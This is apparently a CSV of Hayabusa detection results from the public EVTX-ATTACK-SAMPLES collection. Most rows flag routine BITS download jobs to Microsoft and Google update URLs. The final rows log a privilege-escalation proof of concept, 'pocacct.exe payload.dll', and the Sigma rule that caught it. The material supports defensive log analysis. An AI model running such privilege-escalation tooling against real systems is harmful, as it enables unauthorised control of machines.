https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | 
Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push 
Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: 
http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
